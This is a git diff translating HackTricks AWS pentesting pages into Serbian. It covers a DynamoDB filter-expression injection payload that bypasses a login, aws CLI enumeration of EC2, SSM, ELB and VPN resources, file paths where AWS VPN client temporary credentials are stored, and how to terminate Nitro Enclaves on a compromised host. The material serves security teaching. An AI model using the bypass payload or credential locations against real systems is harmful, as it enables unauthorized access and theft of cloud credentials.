 password: none"}],"ComparisonOperator": "NE","AttributeValueList": [{"S": "none
 ```
-
 ### :property Injection
 
-Some SDKs allows to use a string indicating the filtering to be performed like:
-
+Neki SDK-ovi omogućavaju korišćenje stringa koji ukazuje na filtriranje koje treba izvršiti kao:
 ```java
 new ScanSpec().withProjectionExpression("UserName").withFilterExpression(user_input+" = :username and Password = :password").withValueMap(valueMap)
 ```
+Morate znati da prilikom pretrage u DynamoDB za **zamenu** vrednosti **atributa** u **filter izrazima** dok skenirate stavke, tokeni treba da **počnu** sa **`:`** karakterom. Takvi tokeni će biti **zamenjeni** stvarnom **vrednosti atributa u vreme izvršavanja**.
 
-You need to know that searching in DynamoDB for **substituting** an attribute **value** in **filter expressions** while scanning the items, the tokens should **begin** with the **`:`** character. Such tokens will be **replaced** with actual **attribute value at runtime**.
-
-Therefore, a login like the previous one can be bypassed with something like:
-
+Stoga, prijava poput prethodne može biti zaobiđena sa nečim poput:
 ```bash
 :username = :username or :username
 # This will generate the query:
 # :username = :username or :username = :username and Password = :password
 # which is always true
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md b/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md
index f365bc7f5..e1e82e1b9 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md
@@ -4,7 +4,7 @@
 
 ## VPC & Networking
 
-Learn what a VPC is and about its components in:
+Saznajte šta je VPC i o njegovim komponentama u:
 
 {{#ref}}
 aws-vpc-and-networking-basic-information.md
@@ -12,37 +12,36 @@ aws-vpc-and-networking-basic-information.md
 
 ## EC2
 
-Amazon EC2 is utilized for initiating **virtual servers**. It allows for the configuration of **security** and **networking** and the management of **storage**. The flexibility of Amazon EC2 is evident in its ability to scale resources both upwards and downwards, effectively adapting to varying requirement changes or surges in popularity. This feature diminishes the necessity for precise traffic predictions.
+Amazon EC2 se koristi za pokretanje **virtuelnih servera**. Omogućava konfiguraciju **bezbednosti** i **mreže** i upravljanje **skladištem**. Fleksibilnost Amazon EC2 je očigledna u njegovoj sposobnosti da skalira resurse kako naviše, tako i naniže, efikasno se prilagođavajući promenama zahteva ili porastima popularnosti. Ova funkcija smanjuje potrebu za preciznim predikcijama saobraćaja.
 
-Interesting things to enumerate in EC2:
+Zanimljive stvari za enumeraciju u EC2:
 
-- Virtual Machines
-  - SSH Keys
-  - User Data
-  - Existing EC2s/AMIs/Snapshots
-- Networking
-  - Networks
-  - Subnetworks
-  - Public IPs
-  - Open ports
-- Integrated connections with other networks outside AWS
+- Virtuelne mašine
+- SSH ključevi
+- Podaci o korisnicima
+- Postojeći EC2/AMI/snapshoti
+- Mreža
+- Mreže
+- Podmreže
+- Javne IP adrese
+- Otvoreni portovi
+- Integrisane veze sa drugim mrežama van AWS-a
 
 ### Instance Profiles
 
-Using **roles** to grant permissions to applications that run on **EC2 instances** requires a bit of extra configuration. An application running on an EC2 instance is abstracted from AWS by the virtualized operating system. Because of this extra separation, you need an additional step to assign an AWS role and its associated permissions to an EC2 instance and make them available to its applications.
+Korišćenje **rola** za dodeljivanje dozvola aplikacijama koje se pokreću na **EC2 instancama** zahteva malo dodatne konfiguracije. Aplikacija koja se pokreće na EC2 instanci je apstrahovana od AWS-a putem virtuelizovanog operativnog sistema. Zbog ove dodatne separacije, potrebna je dodatna faza za dodeljivanje AWS uloge i njenih povezanih dozvola EC2 instanci i njihovo dostupnost aplikacijama.
 
-This extra step is the **creation of an** [_**instance profile**_](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_switch-role-ec2_instance-profiles.html) attached to the instance. The **instance profile contains the role and** can provide the role's temporary credentials to an application that runs on the instance. Those temporary credentials can then be used in the application's API calls to access resources and to limit access to only those resources that the role specifies. Note that **only one role can be assigned to an EC2 instance** at a time, and all applications on the instance share the same role and permissions.
+Ova dodatna faza je **kreiranje** [_**instance profile**_](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_switch-role-ec2_instance-profiles.html) vezanog za instancu. **Instance profile sadrži ulogu i** može obezbediti privremene akreditive uloge aplikaciji koja se pokreće na instanci. Ti privremeni akreditive se zatim mogu koristiti u API pozivima aplikacije za pristup resursima i za ograničavanje pristupa samo onim resursima koje uloga specificira. Imajte na umu da **samo jedna uloga može biti dodeljena EC2 instanci** u isto vreme, a sve aplikacije na instanci dele istu ulogu i dozvole.
 
 ### Metadata Endpoint
 
-AWS EC2 metadata is information about an Amazon Elastic Compute Cloud (EC2) instance that is available to the instance at runtime. This metadata is used to provide information about the instance, such as its instance ID, the availability zone it is running in, the IAM role associated with the instance, and the instance's hostname.
+AWS EC2 metapodaci su informacije o Amazon Elastic Compute Cloud (EC2) instanci koje su dostupne instanci u vreme izvršavanja. Ovi metapodaci se koriste za pružanje informacija o instanci, kao što su njen ID instance, dostupna zona u kojoj se pokreće, IAM uloga povezana sa instancom i ime hosta instance.
 
 {{#ref}}
 https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf
 {{#endref}}
 
 ### Enumeration
-
 ```bash
 # Get EC2 instances
 aws ec2 describe-instances
@@ -50,10 +49,10 @@ aws ec2 describe-instance-status #Get status from running instances
 
 # Get user data from each ec2 instance
 for instanceid in $(aws ec2 describe-instances --profile  --region us-west-2 | grep -Eo '"i-[a-zA-Z0-9]+' | tr -d '"'); do
-  echo "Instance ID: $instanceid"
-  aws ec2 describe-instance-attribute --profile  --region us-west-2 --instance-id "$instanceid" --attribute userData | jq ".UserData.Value" | tr -d '"' | base64 -d
-  echo ""
-  echo "-------------------"
+echo "Instance ID: $instanceid"
+aws ec2 describe-instance-attribute --profile  --region us-west-2 --instance-id "$instanceid" --attribute userData | jq ".UserData.Value" | tr -d '"' | base64 -d
+echo ""
+echo "-------------------"
 done
 
 # Instance profiles
@@ -128,8 +127,7 @@ aws ec2 describe-route-tables
 aws ec2 describe-vpcs
 aws ec2 describe-vpc-peering-connections
 ```
-
-### Unauthenticated Access
+### Neautentifikovani Pristup
 
 {{#ref}}
 ../../aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md
@@ -137,13 +135,13 @@ aws ec2 describe-vpc-peering-connections
 
 ### Privesc
 
-In the following page you can check how to **abuse EC2 permissions to escalate privileges**:
+Na sledećoj stranici možete proveriti kako da **zloupotrebite EC2 dozvole za eskalaciju privilegija**:
 
 {{#ref}}
 ../../aws-privilege-escalation/aws-ec2-privesc.md
 {{#endref}}
 
-### Post-Exploitation
+### Post-eksploatacija
 
 {{#ref}}
 ../../aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/
@@ -151,17 +149,17 @@ In the following page you can check how to **abuse EC2 permissions to escalate p
 
 ## EBS
 
-Amazon **EBS** (Elastic Block Store) **snapshots** are basically static **backups** of AWS EBS volumes. In other words, they are **copies** of the **disks** attached to an **EC2** Instance at a specific point in time. EBS snapshots can be copied across regions and accounts, or even downloaded and run locally.
+Amazon **EBS** (Elastic Block Store) **snapshot-i** su u suštini statični **backup-i** AWS EBS volumena. Drugim rečima, to su **kopije** **diskova** povezanih sa **EC2** instancom u određenom trenutku. EBS snapshot-i se mogu kopirati između regiona i naloga, ili čak preuzeti i pokrenuti lokalno.
 
-Snapshots can contain **sensitive information** such as **source code or APi keys**, therefore, if you have the chance, it's recommended to check it.
+Snapshot-i mogu sadržati **osetljive informacije** kao što su **izvorni kod ili API ključevi**, stoga, ako imate priliku, preporučuje se da ih proverite.
 
-### Difference AMI & EBS
+### Razlika između AMI i EBS
 
-An **AMI** is used to **launch an EC2 instance**, while an EC2 **Snapshot** is used to **backup and recover data stored on an EBS volume**. While an EC2 Snapshot can be used to create a new AMI, it is not the same thing as an AMI, and it does not include information about the operating system, application server, or other software required to run an application.
+**AMI** se koristi za **pokretanje EC2 instance**, dok se EC2 **Snapshot** koristi za **backup i oporavak podataka sa EBS volumena**. Dok se EC2 Snapshot može koristiti za kreiranje novog AMI-ja, to nije isto što i AMI, i ne uključuje informacije o operativnom sistemu, serverskom aplikaciji ili drugom softveru potrebnom za pokretanje aplikacije.
 
 ### Privesc
 
-In the following page you can check how to **abuse EBS permissions to escalate privileges**:
+Na sledećoj stranici možete proveriti kako da **zloupotrebite EBS dozvole za eskalaciju privilegija**:
 
 {{#ref}}
 ../../aws-privilege-escalation/aws-ebs-privesc.md
@@ -169,14 +167,13 @@ In the following page you can check how to **abuse EBS permissions to escalate p
 
 ## SSM
 
-**Amazon Simple Systems Manager (SSM)** allows to remotely manage floats of EC2 instances to make their administrations much more easy. Each of these instances need to be running the **SSM Agent service as the service will be the one getting the actions and performing them** from the AWS API.
+**Amazon Simple Systems Manager (SSM)** omogućava daljinsko upravljanje flotama EC2 instanci kako bi njihova administracija bila mnogo lakša. Svaka od ovih instanci treba da pokreće **SSM Agent servis, jer će taj servis obavljati akcije i izvršavati ih** putem AWS API-ja.
 
-**SSM Agent** makes it possible for Systems Manager to update, manage, and configure these resources. The agent **processes requests from the Systems Manager service in the AWS Cloud**, and then runs them as specified in the request.
+**SSM Agent** omogućava Systems Manager-u da ažurira, upravlja i konfiguriše ove resurse. Agent **obrađuje zahteve od Systems Manager servisa u AWS Cloudu**, a zatim ih izvršava kako je navedeno u zahtevu.
 
-The **SSM Agent comes**[ **preinstalled in some AMIs**](https://docs.aws.amazon.com/systems-manager/latest/userguide/ami-preinstalled-agent.html) or you need to [**manually install them**](https://docs.aws.amazon.com/systems-manager/latest/userguide/sysman-manual-agent-install.html) on the instances. Also, the IAM Role used inside the instance needs to have the policy **AmazonEC2RoleforSSM** attached to be able to communicate.
-
-### Enumeration
+**SSM Agent dolazi**[ **predinstaliran u nekim AMI-jima**](https://docs.aws.amazon.com/systems-manager/latest/userguide/ami-preinstalled-agent.html) ili ga treba [**ručno instalirati**](https://docs.aws.amazon.com/systems-manager/latest/userguide/sysman-manual-agent-install.html) na instancama. Takođe, IAM uloga koja se koristi unutar instance treba da ima politiku **AmazonEC2RoleforSSM** prikačenu da bi mogla da komunicira.
 
+### Enumeracija
 ```bash
 aws ssm describe-instance-information
 aws ssm describe-parameters
@@ -185,16 +182,13 @@ aws ssm describe-instance-patches --instance-id 
 aws ssm describe-instance-patch-states --instance-ids 
 aws ssm describe-instance-associations-status --instance-id 
 ```
-
-You can check in an EC2 instance if Systems Manager is runnign just by executing:
-
+Možete proveriti da li Systems Manager radi u EC2 instanci jednostavno izvršavanjem:
 ```bash
 ps aux | grep amazon-ssm
 ```
-
 ### Privesc
 
-In the following page you can check how to **abuse SSM permissions to escalate privileges**:
+Na sledećoj stranici možete proveriti kako da **zloupotrebite SSM dozvole za eskalaciju privilegija**:
 
 {{#ref}}
 ../../aws-privilege-escalation/aws-ssm-privesc.md
@@ -202,10 +196,9 @@ In the following page you can check how to **abuse SSM permissions to escalate p
 
 ## ELB
 
-**Elastic Load Balancing** (ELB) is a **load-balancing service for Amazon Web Services** (AWS) deployments. ELB automatically **distributes incoming application traffic** and scales resources to meet traffic demands.
+**Elastic Load Balancing** (ELB) je **usluga ravnoteže opterećenja za Amazon Web Services** (AWS) implementacije. ELB automatski **distribuira dolazni aplikativni saobraćaj** i skalira resurse kako bi zadovoljio zahteve saobraćaja.
 
 ### Enumeration
-
 ```bash
 # List internet-facing ELBs
 aws elb describe-load-balancers
@@ -216,11 +209,9 @@ aws elbv2 describe-load-balancers
 aws elbv2 describe-load-balancers | jq '.LoadBalancers[].DNSName'
 aws elbv2 describe-listeners --load-balancer-arn 
 ```
+## Šabloni za pokretanje i grupe automatskog skaliranja
 
-## Launch Templates & Autoscaling Groups
-
-### Enumeration
-
+### Enumeracija
 ```bash
 # Launch templates
 aws ec2 describe-launch-templates
@@ -235,12 +226,11 @@ aws autoscaling describe-launch-configurations
 aws autoscaling describe-load-balancer-target-groups
 aws autoscaling describe-load-balancers
 ```
-
 ## Nitro
 
-AWS Nitro is a suite of **innovative technologies** that form the underlying platform for AWS EC2 instances. Introduced by Amazon to **enhance security, performance, and reliability**, Nitro leverages custom **hardware components and a lightweight hypervisor**. It abstracts much of the traditional virtualization functionality to dedicated hardware and software, **minimizing the attack surface** and improving resource efficiency. By offloading virtualization functions, Nitro allows EC2 instances to deliver **near bare-metal performance**, making it particularly beneficial for resource-intensive applications. Additionally, the Nitro Security Chip specifically ensures the **security of the hardware and firmware**, further solidifying its robust architecture.
+AWS Nitro je skup **inovativnih tehnologija** koje čine osnovnu platformu za AWS EC2 instance. Uveden od strane Amazona da **poboljša bezbednost, performanse i pouzdanost**, Nitro koristi prilagođene **hardverske komponente i lagani hipervizor**. Apstrahuje većinu tradicionalne funkcionalnosti virtualizacije na posvećen hardver i softver, **minimizirajući površinu napada** i poboljšavajući efikasnost resursa. Oslobađanjem funkcija virtualizacije, Nitro omogućava EC2 instancama da pruže **performanse blizu onih na fizičkom hardveru**, što ga čini posebno korisnim za aplikacije koje zahtevaju mnogo resursa. Pored toga, Nitro Security Chip posebno osigurava **bezbednost hardvera i firmvera**, dodatno učvršćujući njegovu robusnu arhitekturu.
 
-Get more information and how to enumerate it from:
+Dobijte više informacija i kako da ga enumerišete iz:
 
 {{#ref}}
 aws-nitro-enum.md
@@ -248,35 +238,34 @@ aws-nitro-enum.md
 
 ## VPN
 
-A VPN allows to connect your **on-premise network (site-to-site VPN)** or the **workers laptops (Client VPN)** with a **AWS VPC** so services can accessed without needing to expose them to the internet.
+VPN omogućava povezivanje vaše **lokalne mreže (site-to-site VPN)** ili **laptopova radnika (Client VPN)** sa **AWS VPC** tako da se usluge mogu pristupiti bez potrebe da ih izlažete internetu.
 
-#### Basic AWS VPN Components
+#### Osnovne komponente AWS VPN-a
 
 1. **Customer Gateway**:
-   - A Customer Gateway is a resource that you create in AWS to represent your side of a VPN connection.
-   - It is essentially a physical device or software application on your side of the Site-to-Site VPN connection.
-   - You provide routing information and the public IP address of your network device (such as a router or a firewall) to AWS to create a Customer Gateway.
-   - It serves as a reference point for setting up the VPN connection and doesn't incur additional charges.
+- Customer Gateway je resurs koji kreirate u AWS-u da predstavlja vašu stranu VPN veze.
+- To je u suštini fizički uređaj ili softverska aplikacija na vašoj strani Site-to-Site VPN veze.
+- Pružate informacije o rutiranju i javnu IP adresu vašeg mrežnog uređaja (kao što je ruter ili vatrozid) AWS-u da biste kreirali Customer Gateway.
+- Služi kao referentna tačka za postavljanje VPN veze i ne izaziva dodatne troškove.
 2. **Virtual Private Gateway**:
-   - A Virtual Private Gateway (VPG) is the VPN concentrator on the Amazon side of the Site-to-Site VPN connection.
-   - It is attached to your VPC and serves as the target for your VPN connection.
-   - VPG is the AWS side endpoint for the VPN connection.
-   - It handles the secure communication between your VPC and your on-premises network.
+- Virtual Private Gateway (VPG) je VPN koncentrator na Amazon strani Site-to-Site VPN veze.
+- Priključen je na vaš VPC i služi kao cilj za vašu VPN vezu.
+- VPG je AWS strana krajnje tačke za VPN vezu.
+- Rukuje sigurnom komunikacijom između vašeg VPC-a i vaše lokalne mreže.
 3. **Site-to-Site VPN Connection**:
-   - A Site-to-Site VPN connection connects your on-premises network to a VPC through a secure, IPsec VPN tunnel.
-   - This type of connection requires a Customer Gateway and a Virtual Private Gateway.
-   - It's used for secure, stable, and consistent communication between your data center or network and your AWS environment.
-   - Typically used for regular, long-term connections and is billed based on the amount of data transferred over the connection.
+- Site-to-Site VPN veza povezuje vašu lokalnu mrežu sa VPC-om kroz sigurni, IPsec VPN tunel.
+- Ova vrsta veze zahteva Customer Gateway i Virtual Private Gateway.
+- Koristi se za sigurnu, stabilnu i doslednu komunikaciju između vašeg data centra ili mreže i vašeg AWS okruženja.
+- Obično se koristi za redovne, dugoročne veze i naplaćuje se na osnovu količine podataka prenetih preko veze.
 4. **Client VPN Endpoint**:
-   - A Client VPN endpoint is a resource that you create in AWS to enable and manage client VPN sessions.
-   - It is used for allowing individual devices (like laptops, smartphones, etc.) to securely connect to AWS resources or your on-premises network.
-   - It differs from Site-to-Site VPN in that it is designed for individual clients rather than connecting entire networks.
-   - With Client VPN, each client device uses a VPN client software to establish a secure connection.
+- Client VPN endpoint je resurs koji kreirate u AWS-u da omogućite i upravljate klijent VPN sesijama.
+- Koristi se za omogućavanje pojedinačnim uređajima (kao što su laptopi, pametni telefoni itd.) da sigurno povežu sa AWS resursima ili vašom lokalnom mrežom.
+- Razlikuje se od Site-to-Site VPN-a po tome što je dizajniran za pojedinačne klijente, a ne za povezivanje celih mreža.
+- Sa Client VPN-om, svaki klijentski uređaj koristi VPN klijentski softver za uspostavljanje sigurne veze.
 
-You can [**find more information about the benefits and components of AWS VPNs here**](aws-vpc-and-networking-basic-information.md#vpn).
+Možete [**pronaći više informacija o prednostima i komponentama AWS VPN-a ovde**](aws-vpc-and-networking-basic-information.md#vpn).
 
 ### Enumeration
-
 ```bash
 # VPN endpoints
 ## Check used subnetwork, authentication, SGs, connected...
@@ -300,31 +289,26 @@ aws ec2 describe-vpn-gateways
 # Get VPN site-to-site connections
 aws ec2 describe-vpn-connections
 ```
+### Lokalna Enumeracija
 
-### Local Enumeration
+**Lokalne Privremene Akreditiv**
 
-**Local Temporary Credentials**
+Kada se koristi AWS VPN klijent za povezivanje na VPN, korisnik obično **prijavljuje se u AWS** da bi dobio pristup VPN-u. Zatim, neki **AWS akreditivi se kreiraju i čuvaju** lokalno kako bi se uspostavila VPN veza. Ovi akreditivi su **čuvani u** `$HOME/.config/AWSVPNClient/TemporaryCredentials//temporary-credentials.txt` i sadrže **AccessKey**, **SecretKey** i **Token**.
 
-When AWS VPN Client is used to connect to a VPN, the user will usually **login in AWS** to get access to the VPN. Then, some **AWS credentials are created and stored** locally to establish the VPN connection. These credentials are **stored in** `$HOME/.config/AWSVPNClient/TemporaryCredentials//temporary-credentials.txt` and contains an **AccessKey**, a **SecretKey** and a **Token**.
+Akreditivi pripadaju korisniku `arn:aws:sts:::assumed-role/aws-vpn-client-metrics-analytics-access-role/CognitoIdentityCredentials` (TODO: istražiti više o dozvolama ovih akreditiva).
 
-The credentials belong to the user `arn:aws:sts:::assumed-role/aws-vpn-client-metrics-analytics-access-role/CognitoIdentityCredentials` (TODO: research more about the permissions of this credentials).
+**opvn konfiguracione datoteke**
 
-**opvn config files**
+Ako je **VPN veza uspostavljena**, trebali biste pretražiti **`.opvn`** konfiguracione datoteke u sistemu. Štaviše, jedno mesto gde možete pronaći **konfiguracije** je u **`$HOME/.config/AWSVPNClient/OpenVpnConfigs`**
 
-If a **VPN connection was stablished** you should search for **`.opvn`** config files in the system. Moreover, one place where you could find the **configurations** is in **`$HOME/.config/AWSVPNClient/OpenVpnConfigs`**
-
-#### **Post Exploitaiton**
+#### **Post Eksploatacija**
 
 {{#ref}}
 ../../aws-post-exploitation/aws-vpn-post-exploitation.md
 {{#endref}}
 
-## References
+## Reference
 
 - [https://docs.aws.amazon.com/batch/latest/userguide/getting-started-ec2.html](https://docs.aws.amazon.com/batch/latest/userguide/getting-started-ec2.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md
index 0575a17d8..0ccc1b524 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md
@@ -2,21 +2,20 @@
 
 {{#include ../../../../banners/hacktricks-training.md}}
 
-## Basic Information
+## Osnovne informacije
 
-AWS Nitro is a suite of **innovative technologies** that form the underlying platform for AWS EC2 instances. Introduced by Amazon to **enhance security, performance, and reliability**, Nitro leverages custom **hardware components and a lightweight hypervisor**. It abstracts much of the traditional virtualization functionality to dedicated hardware and software, **minimizing the attack surface** and improving resource efficiency. By offloading virtualization functions, Nitro allows EC2 instances to deliver **near bare-metal performance**, making it particularly beneficial for resource-intensive applications. Additionally, the Nitro Security Chip specifically ensures the **security of the hardware and firmware**, further solidifying its robust architecture.
+AWS Nitro je skup **inovativnih tehnologija** koje čine osnovnu platformu za AWS EC2 instance. Uveden od strane Amazona da **poboljša bezbednost, performanse i pouzdanost**, Nitro koristi prilagođene **hardverske komponente i lagani hipervizor**. Apstrahuje većinu tradicionalnih funkcionalnosti virtualizacije na posvećen hardver i softver, **minimizirajući površinu napada** i poboljšavajući efikasnost resursa. Prebacivanjem funkcija virtualizacije, Nitro omogućava EC2 instancama da pružaju **performanse blizu onih na fizičkom hardveru**, što je posebno korisno za aplikacije koje zahtevaju mnogo resursa. Pored toga, Nitro Security Chip posebno osigurava **bezbednost hardvera i firmvera**, dodatno učvršćujući svoju robusnu arhitekturu.
 
-### Nitro Enclaves
+### Nitro Enklave
 
-**AWS Nitro Enclaves** provides a secure, **isolated compute environment within Amazon EC2 instances**, specifically designed for processing highly sensitive data. Leveraging the AWS Nitro System, these enclaves ensure robust **isolation and security**, ideal for **handling confidential information** such as PII or financial records. They feature a minimalist environment, significantly reducing the risk of data exposure. Additionally, Nitro Enclaves support cryptographic attestation, allowing users to verify that only authorized code is running, crucial for maintaining strict compliance and data protection standards.
+**AWS Nitro Enclaves** pruža sigurno, **izolovano okruženje za obradu unutar Amazon EC2 instanci**, posebno dizajnirano za obradu veoma osetljivih podataka. Koristeći AWS Nitro sistem, ove enklave osiguravaju robusnu **izolaciju i bezbednost**, idealne za **rukovanje poverljivim informacijama** kao što su PII ili finansijski podaci. Imaju minimalističko okruženje, značajno smanjujući rizik od izlaganja podataka. Pored toga, Nitro Enclaves podržavaju kriptografsku attestaciju, omogućavajući korisnicima da verifikuju da samo autorizovani kod radi, što je ključno za održavanje strogih standarda usklađenosti i zaštite podataka.
 
 > [!CAUTION]
-> Nitro Enclave images are **run from inside EC2 instances** and you cannot see from the AWS web console if an EC2 instances is running images in Nitro Enclave or not.
+> Nitro Enclave slike se **pokreću iznutra EC2 instanci** i ne možete videti iz AWS web konzole da li EC2 instance pokreću slike u Nitro Enclave ili ne.
 
-## Nitro Enclave CLI installation
-
-Follow the all instructions [**from the documentation**](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli#run-connect-and-terminate-the-enclave). However, these are the most important ones:
+## Instalacija Nitro Enclave CLI
 
+Pratite sve uputstva [**iz dokumentacije**](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli#run-connect-and-terminate-the-enclave). Međutim, ovo su najvažnija:
 ```bash
 # Install tools
 sudo amazon-linux-extras install aws-nitro-enclaves-cli -y
@@ -32,47 +31,39 @@ nitro-cli --version
 # Start and enable the Nitro Enclaves allocator service.
 sudo systemctl start nitro-enclaves-allocator.service && sudo systemctl enable nitro-enclaves-allocator.service
 ```
-
 ## Nitro Enclave Images
 
-The images that you can run in Nitro Enclave are based on docker images, so you can create your Nitro Enclave images from docker images like:
-
+Slike koje možete pokrenuti u Nitro Enclave su zasnovane na docker slikama, tako da možete kreirati svoje Nitro Enclave slike iz docker slika kao što su:
 ```bash
 # You need to have the docker image accesible in your running local registry
 # Or indicate the full docker image URL to access the image
 nitro-cli build-enclave --docker-uri : --output-file nitro-img.eif
 ```
+Kao što možete videti, Nitro Enclave slike koriste ekstenziju **`eif`** (Enclave Image File).
 
-As you can see the Nitro Enclave images use the extension **`eif`** (Enclave Image File).
-
-The output will look similar to:
-
+Izlaz će izgledati slično:
 ```
 Using the locally available Docker image...
 Enclave Image successfully created.
 {
-  "Measurements": {
-    "HashAlgorithm": "Sha384 { ... }",
-    "PCR0": "e199261541a944a93129a52a8909d29435dd89e31299b59c371158fc9ab3017d9c450b0a580a487e330b4ac691943284",
-    "PCR1": "bcdf05fefccaa8e55bf2c8d6dee9e79bbff31e34bf28a99aa19e6b29c37ee80b214a414b7607236edf26fcb78654e63f",
-    "PCR2": "2e1fca1dbb84622ec141557dfa971b4f8ea2127031b264136a20278c43d1bba6c75fea286cd4de9f00450b6a8db0e6d3"
-  }
+"Measurements": {
+"HashAlgorithm": "Sha384 { ... }",
+"PCR0": "e199261541a944a93129a52a8909d29435dd89e31299b59c371158fc9ab3017d9c450b0a580a487e330b4ac691943284",
+"PCR1": "bcdf05fefccaa8e55bf2c8d6dee9e79bbff31e34bf28a99aa19e6b29c37ee80b214a414b7607236edf26fcb78654e63f",
+"PCR2": "2e1fca1dbb84622ec141557dfa971b4f8ea2127031b264136a20278c43d1bba6c75fea286cd4de9f00450b6a8db0e6d3"
+}
 }
 ```
+### Pokreni sliku
 
-### Run an Image
-
-As per [**the documentation**](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli#run-connect-and-terminate-the-enclave), in order to run an enclave image you need to assign it memory of **at least 4 times the size of the `eif` file**. It's possible to configure the default resources to give to it in the file
-
+Prema [**dokumentaciji**](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli#run-connect-and-terminate-the-enclave), da biste pokrenuli sliku enklave, potrebno je da joj dodelite memoriju **od najmanje 4 puta veličine `eif` fajla**. Moguće je konfigurisati podrazumevane resurse koje joj dodelju u fajlu.
 ```shell
 /etc/nitro_enclaves/allocator.yaml
 ```
-
 > [!CAUTION]
-> Always remember that you need to **reserve some resources for the parent EC2** instance also!
-
-After knowing the resources to give to an image and even having modified the configuration file it's possible to run an enclave image with:
+> Uvek zapamtite da treba da **rezervišete neke resurse za roditeljsku EC2** instancu!
 
+Nakon što znate resurse koje treba dodeliti slici i čak ste izmenili konfiguracioni fajl, moguće je pokrenuti sliku enklave sa:
 ```shell
 # Restart the service so the new default values apply
 sudo systemctl start nitro-enclaves-allocator.service && sudo systemctl enable nitro-enclaves-allocator.service
@@ -80,80 +71,72 @@ sudo systemctl start nitro-enclaves-allocator.service && sudo systemctl enable n
 # Indicate the CPUs and memory to give
 nitro-cli run-enclave --cpu-count 2 --memory 3072 --eif-path hello.eif --debug-mode --enclave-cid 16
 ```
-
 ### Enumerate Enclaves
 
-If you compromise and EC2 host it's possible to get a list of running enclave images with:
-
+Ako kompromitujete EC2 host, moguće je dobiti listu pokrenutih slika enklava sa:
 ```bash
 nitro-cli describe-enclaves
 ```
-
-It's **not possible to get a shell** inside a running enclave image because thats the main purpose of enclave, however, if you used the parameter **`--debug-mode`**, it's possible to get the **stdout** of it with:
-
+Nije **moguće dobiti shell** unutar pokrenutog enclave imidža jer je to glavna svrha enclave, međutim, ako koristite parametar **`--debug-mode`**, moguće je dobiti **stdout** sa:
 ```shell
 ENCLAVE_ID=$(nitro-cli describe-enclaves | jq -r ".[0].EnclaveID")
 nitro-cli console --enclave-id ${ENCLAVE_ID}
 ```
-
 ### Terminate Enclaves
 
-If an attacker compromise an EC2 instance by default he won't be able to get a shell inside of them, but he will be able to **terminate them** with:
-
+Ako napadač kompromituje EC2 instancu, po defaultu neće moći da dobije shell unutar njih, ali će moći da **terminate them** sa:
 ```shell
 nitro-cli terminate-enclave --enclave-id ${ENCLAVE_ID}
 ```
-
 ## Vsocks
 
-The only way to communicate with an **enclave** running image is using **vsocks**.
+Jedini način za komunikaciju sa **enklavom** koja pokreće sliku je korišćenje **vsocks**.
 
-**Virtual Socket (vsock)** is a socket family in Linux specifically designed to facilitate **communication** between virtual machines (**VMs**) and their **hypervisors**, or between VMs **themselves**. Vsock enables efficient, **bi-directional communication** without relying on the host's networking stack. This makes it possible for VMs to communicate even without network configurations, **using a 32-bit Context ID (CID) and port numbers** to identify and manage connections. The vsock API supports both stream and datagram socket types, similar to TCP and UDP, providing a versatile tool for user-level applications in virtual environments.
+**Virtual Socket (vsock)** je porodica soketa u Linuxu posebno dizajnirana da olakša **komunikaciju** između virtuelnih mašina (**VMs**) i njihovih **hipervizora**, ili između VMs **same**. Vsock omogućava efikasnu, **dvosmernu komunikaciju** bez oslanjanja na mrežni stek hosta. Ovo omogućava VMs da komuniciraju čak i bez mrežnih konfiguracija, **koristeći 32-bitni Context ID (CID) i brojeve portova** za identifikaciju i upravljanje vezama. Vsock API podržava i stream i datagram tipove soketa, slično TCP i UDP, pružajući svestran alat za aplikacije na korisničkom nivou u virtuelnim okruženjima.
 
 > [!TIP]
-> Therefore, an vsock address looks like this: `:`
+> Stoga, vsock adresa izgleda ovako: `:`
 
-To find **CIDs** of the enclave running images you could just execute the following cmd and thet the **`EnclaveCID`**:
+Da biste pronašli **CIDs** slika koje pokreće enklava, možete jednostavno izvršiti sledeću komandu i dobiti **`EnclaveCID`**:
 
 
nitro-cli describe-enclaves
 
 [
-  {
-    "EnclaveName": "secure-channel-example",
-    "EnclaveID": "i-0bc274f83ade02a62-enc18ef3d09c886748",
-    "ProcessID": 10131,
+{
+"EnclaveName": "secure-channel-example",
+"EnclaveID": "i-0bc274f83ade02a62-enc18ef3d09c886748",
+"ProcessID": 10131,
     "EnclaveCID": 16,
     "NumberOfCPUs": 2,
-    "CPUIDs": [
-      1,
-      3
-    ],
-    "MemoryMiB": 1024,
-    "State": "RUNNING",
-    "Flags": "DEBUG_MODE",
-    "Measurements": {
-      "HashAlgorithm": "Sha384 { ... }",
